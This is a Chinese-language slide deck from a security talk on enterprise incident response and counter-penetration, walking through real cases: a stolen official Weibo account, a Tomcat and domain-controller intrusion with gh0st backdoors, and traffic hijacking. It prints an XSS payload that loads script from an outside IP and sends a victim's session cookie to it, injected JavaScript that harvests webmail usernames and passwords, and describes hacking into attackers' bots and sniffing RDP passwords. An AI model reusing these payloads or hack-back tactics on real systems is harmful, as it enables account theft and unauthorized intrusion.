9.“企业应急响应与反渗透”之真实案例分析
- 2. 关于我
- 3. • piaca • 乌云⽩白帽⼦子 • Insight Labs 成员 • 前新浪安全架构师 • ⼋八年安全从业经验
- 4. • 应急响应介绍 • ⼀一些案例 • 总结
- 5. 什么是应急响应?
- 6. 被“⿊黑”了 • 被⼊入侵 • 被 DDoS • 被劫持 • 被蠕⾍虫 • 被钓⻥鱼 • ……
- 7. 为什么做应急响应?
- 8. 被逼的
- 9. • 保障业务 • 解决⽅方案 • 司法途径 • 还原攻击 • 明确意图 为什么做应急响应? • 查漏补缺
- 10. 怎么做应急响应?
- 11. • 确定攻击时间 • 查找攻击线索 • 实施解决⽅方案 怎么做应急响应? • 定位攻击⼈人,取证 • 梳理攻击流程
- 12. 为什么做反渗透?
- 13. • 被动变主动 • 攻击者都在做什么 为什么反渗透? • 确认攻击者是谁 • 取证
- 14. 案例之官微帐号被盗
- 16. • ⾮非⼯工作⼈人员操作 • 帐号有被 cookie 登录 分析原因 • 可是 cookie 有 httponly
- 17. ================================================== URL : http://t.cn/zWI1bUQ Last Visit Date : 2012-7-16 19:22:27 ================================================== ================================================== URL : http://50.116.13.242/index.php Last Visit Date : 2012-7-16 19:22:28 Referrer : http://t.cn/zWI1bUQ ================================================== ================================================== URL : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js %3E%3C/script%3E%22%27}) Last Visit Date : 2012-7-16 19:22:28 Referrer : http://50.116.13.242/index.php Title : player.swf (application/x-shockwave-flash 对象) ================================================== ================================================== URL : http://50.116.13.242/e.php?opener=0&cookie=ULV %3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma %3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn %3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B %20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%[email protected]%3B%20wvr%3D3.6%3B%20_s_tentry %3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B %20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des %253D5937b4f4509871fc45195767ea7abe37%2526ev %253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c %25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V %25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2 Last Visit Date : 2012-7-16 19:22:31 Referrer : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js %3E%3C/script%3E%22%27}) ==================================================
- 18. ⼯工作⼈人员收到⼀一条私信……
- 19. • 某分站 XSS • 某分站 Apache CVE-2012-0053 还原攻击
- 20. • 修复漏洞,修复同类漏洞 • 加强员⼯工安全意识 我们做了什么 • 增加帐号安全策略
- 21. • 通过 IP / 邮箱信息定位到某公司安全⼈人员 • 没有恶意⺫⽬目的 关于攻击者 • 后⾯面有把漏洞提交乌云
- 24. • 500 错误代表⽂文件存在并且执⾏行 • ⾮非业务⽂文件 分析原因 • 从更多的⽇日志⼊入⼿手
- 27. • 通过⽇日志确认⼊入侵途径是 tomcat • 做了⼀一些操作 还原攻击 • tomcat 帐号密码并⾮非弱密码,how?
- 28. • 全⺴⽹网排查 • 攻击者早在⼏几⽉月前就发⽣生 再次分析原因并且还原攻击 • 通过收集帐号密码
- 29. • 收集攻击者 IP • ⼤大多是⾁肉鸡 IP,⾹香港,廊坊 吹响反击号⾓角 • ⽤用“⿊黑客”的⽅方法拿到⾹香港,廊坊多台⾁肉鸡权限 • 在⾁肉鸡上发现⼤大量⿊黑客⼯工具和扫描⽇日志 • 在⾁肉鸡上发现内⺴⽹网仍有服务器被控制
- 32. • 清理全⺴⽹网 tomcat 我们做了什么 • 修改业务相关帐号密码 • 部署 snort • IDC 出⼝口策略 • 梳理全⺴⽹网 web ⺫⽬目录⽂文件 • 修改业务关键代码 • 清理后⻔门
- 33. 这就完了?
- 34. 很傻很天真
- 35. IT 反馈域控服务器异常
- 36. gh0st
- 37. • 多台服务器被植⼊入后⻔门 继续分析 • 通过 at ⽅方式植⼊入后⻔门 • 通过域控管理帐号 • 确定被植⼊入后⻔门最初时间
- 38. 2011-‐11-‐10,14:03:47,Security,审核成功,登录/注销 ,540,**,PDC,”成功的网络登录: 用户名: *.ad 域: * 登录 ID: (0x0,0x1114E11) 登录类型: 3 登录过程: NtLmSsp 身份验证数据包: NTLM 工作站名: CC-‐TEST-‐V2 登录 GUID: -‐ 调用方用户名: -‐ 调用方域: -‐ 调用方登录 ID: -‐ 调用方进程 ID: -‐ 传递服务: -‐ 源网络地址: 192.168.100.81 源端口: 0 2011-‐11-‐10,3:13:38,Security,审核失败,帐户登录 ,680,NT AUTHORITYSYSTEM,PDC,"尝试登录的用户: MICROSOFT_AUTHENTICATION_PACKAGE_V1_ 登录帐户: QM-‐*$ 源工作站: CC-‐TEST-‐V2 错误代码: 0xC000006A " 2011-‐11-‐10,3:13:38,Security,审核失败,帐户登录 ,680,NT AUTHORITYSYSTEM,PDC,"尝试登录的用户: MICROSOFT_AUTHENTICATION_PACKAGE_V1_ 登录帐户: QM-‐*$ 源工作站: CC-‐TEST-‐V2 错误代码: 0xC000006A
- 39. • 虚拟机 192.168.100.81 • 弱⼝口令 • 内⺴⽹网检查时关机,逃过检查 • ⺫⽬目前能够确定这台是最初被渗透的 • 域控管理登录过 • 通过抓去 hash 控制域控
- 41. • snort 加特征,发现仍有服务器被控制 我们⼜又做了什么 • 排查所有 windows 服务器 • 继续排查
- 43. • 还有美国的 IP 持续反击中 • 通过 C 段 cain 嗅探到 3389 密码
- 45. • 美国的 vps 上含有多个 QQ 和密码 关于攻击者 • 之前获取到其国内论坛帐号
- 47. 案例之永⽆无⽌止境的劫持
- 48. • 某业务多次多种类型劫持 • 某业务链路劫持被插⼊入⼲⼴广告 案例之永⽆无⽌止境的劫持 • DNS 劫持 • 链路劫持 • 劫持到⼀一个反向代理 IP 61.*.*.2
- 51. function ffCheck() { try { try { var u = null != f ? f.idInput.value : document.getElementById("idInput").value; } catch (e) { var u = (document.getElementById("idInput").innerHTML).replace(/s/g, ""); } var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value; if (u.indexOf("@") == -1) u += "@xxx.com"; try { if (u.indexOf("@") == -1) u = u + getdomain(); } catch (e) {} sendurl("/abc", u, p, "coremail"); } catch (e) {} return fOnSubmit(); }
- 52. function sendurl(uri, u, p, i) { xmlHttp = GetXmlHttpObject(); if (xmlHttp == null) { return; } param = "user=" + u + "&pass=" + p + "&icp=" + i; xmlHttp.onreadystatechange = stateChanged; try { xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true); } catch (e) {} xmlHttp.setRequestHeader("If-Modified-Since", "0"); xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlHttp.send(param); }
- 53. • 定位劫持位置 • 投诉 处理过程 • TTL • IP
- 54. 然并卵
- 56. • 业务⾓角度 总结 • 保障业务优先 • 对抗⾓角度 • 了解对⼿手 • 技术⾓角度 • 攻击技术 • ⽇日志、流量等数据
- 57. 谢谢!